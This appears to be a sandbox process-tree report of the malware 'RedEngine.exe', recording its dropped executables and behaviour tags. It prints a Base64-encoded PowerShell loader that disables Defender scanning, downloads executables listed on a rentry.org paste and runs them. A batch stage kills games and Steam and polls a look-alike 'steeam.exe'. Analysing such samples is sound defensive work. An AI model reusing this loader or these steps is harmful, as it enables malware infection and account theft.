"C:\Users\Admin\AppData\Local\Temp\Temp1_RedEngine.zip\RedEngine.exe"
1⤵
PID:4984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2308

C:\Users\Admin\AppData\Roaming\mopebpra.il00.exe
"C:\Users\Admin\AppData\Roaming\mopebpra.il00.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:3440

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3710.tmp\3711.tmp\3712.bat C:\Users\Admin\AppData\Roaming\mopebpra.il00.exe"
4⤵
PID:2596

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:1124

C:\Windows\system32\chcp.com
chcp 1251
5⤵
PID:4192

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:4532

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:4988

C:\Windows\system32\findstr.exe
findstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"
5⤵
PID:1852

C:\Windows\system32\schtasks.exe
schtasks /query /tn "MyBatchScript"
5⤵
PID:3504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
5⤵
PID:3576

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath
6⤵
PID:1888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
5⤵
PID:4192

C:\Windows\system32\reg.exe
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop
6⤵
PID:4532

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:4880

C:\Windows\system32\find.exe
find /i "tf_win64.exe"
5⤵
PID:2864

C:\Windows\system32\taskkill.exe
taskkill /f /im tf_win64.exe
5⤵
- Kills process with taskkill
PID:5240

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:5296

C:\Windows\system32\find.exe
find /i "dota2.exe"
5⤵
PID:5304

C:\Windows\system32\taskkill.exe
taskkill /f /im dota2.exe
5⤵
- Kills process with taskkill
PID:5512

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:5572

C:\Windows\system32\find.exe
find /i "cs2.exe"
5⤵
PID:5588

C:\Windows\system32\taskkill.exe
taskkill /f /im cs2.exe
5⤵
- Kills process with taskkill
PID:5736

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:5768

C:\Windows\system32\find.exe
find /i "RustClient.exe"
5⤵
PID:5776

C:\Windows\system32\taskkill.exe
taskkill /f /im RustClient.exe
5⤵
- Kills process with taskkill
PID:5876

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:5904

C:\Windows\system32\find.exe
find /i "GTA5.exe"
5⤵
PID:5912

C:\Windows\system32\taskkill.exe
taskkill /f /im GTA5.exe
5⤵
- Kills process with taskkill
PID:5948

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:5976

C:\Windows\system32\find.exe
find /i "TslGame.exe"
5⤵
PID:5984

C:\Windows\system32\taskkill.exe
taskkill /f /im TslGame.exe
5⤵
- Kills process with taskkill
PID:6100

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:6128

C:\Windows\system32\find.exe
find /i "RainbowSix.exe"
5⤵
PID:6136

C:\Windows\system32\taskkill.exe
taskkill /f /im RainbowSix.exe
5⤵
- Kills process with taskkill
PID:1768

C:\Windows\system32\timeout.exe
timeout /t 3
5⤵
PID:3000

C:\Windows\system32\tasklist.exe
tasklist
5⤵
- Enumerates processes with tasklist
PID:5188

C:\Windows\system32\find.exe
find /i "steam.exe"
5⤵
PID:2644

C:\Windows\system32\taskkill.exe
taskkill /f /im steam.exe
5⤵
- Kills process with taskkill
PID:5428

C:\Windows\system32\timeout.exe
timeout /t 3
5⤵
PID:5760

C:\Windows\system32\tar.exe
tar -xf "C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar" -C ""
5⤵
PID:5156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5132

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:4132

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5864

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:4192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5320

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5208

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5620

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5844

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5736

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5744

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6120

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6000

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6108

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:5164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5568

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5532

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5304

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:5804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5720

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5732

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:4540

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:6136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:4860

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:1616

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:880

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:2752

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5664

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5580

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:1356

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5408

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5876

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5624

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5544

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6468

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6520

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6560

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6528

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7044

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6512

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6364

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6928

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6504

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:6516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6108

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:4192

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5980

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6000

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5976

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6724

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5248

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5260

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6788

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6848

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5336

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:1004

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5252

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5604

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:4540

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:868

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:4044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:624

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6472

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5244

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5892

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5696

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:2084

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:800

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7016

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:2648

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:5604

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6332

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7064

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:744

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:4944

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5848

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:4932

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:5676

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7236

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7356

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7540

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:8168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7588

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6408

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7260

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7876

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7304

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7992

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7980

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5716

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:8080

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:8148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7196

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7384

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7832

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6960

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7860

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7976

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7584

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:3380

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:6764

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:8056

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7664

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:6032

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7636

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:8180

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:5212

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:8176

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:2924

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:7744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7128

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7512

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7468

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:2424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7896

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:3308

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7588

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
- Delays execution with timeout.exe
PID:8112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:8120

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:8076

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:6428

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:1568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:868

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:5132

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:7524

C:\Windows\system32\timeout.exe
timeout /t 1
5⤵
PID:6108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId | findstr /r /v "^$"
5⤵
PID:7388

C:\Windows\System32\Wbem\WMIC.exe
wmic process where "ExecutablePath='C:\Program Files (x86)\Steam\steeam.exe'" get ProcessId
6⤵
PID:7360

C:\Windows\system32\findstr.exe
findstr /r /v "^$"
6⤵
PID:868

C:\Users\Admin\AppData\Roaming\mopebpra.il01.exe
"C:\Users\Admin\AppData\Roaming\mopebpra.il01.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4436

C:\Users\Admin\AppData\Roaming\mopebpra.il02.exe
"C:\Users\Admin\AppData\Roaming\mopebpra.il02.exe"
3⤵
- Executes dropped EXE
PID:1644

C:\Users\Admin\AppData\Roaming\mopebpra.il03.exe
"C:\Users\Admin\AppData\Roaming\mopebpra.il03.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:4992

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\37FB.tmp\37FC.tmp\37FD.bat C:\Users\Admin\AppData\Roaming\mopebpra.il03.exe"
4⤵
PID:3368

C:\Windows\system32\where.exe
where node
5⤵
PID:4880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3548

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:5224

C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding E3DE84D418F2CE7ED000627210627CF0
2⤵
- Loads dropped DLL
PID:5420

C:\Windows\System32\MsiExec.exe
C:\Windows\System32\MsiExec.exe -Embedding F771DA8112EDB0ED44F2F34CF6C1B47C E Global\MSI0000
2⤵
PID:6848

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 31DC5496770A5C64E4FB093AE274125C
2⤵
PID:7888

C:\Users\Admin\AppData\Local\Temp\Temp1_RedEngine.zip\RedEngine.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_RedEngine.zip\RedEngine.exe"
1⤵
PID:5712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
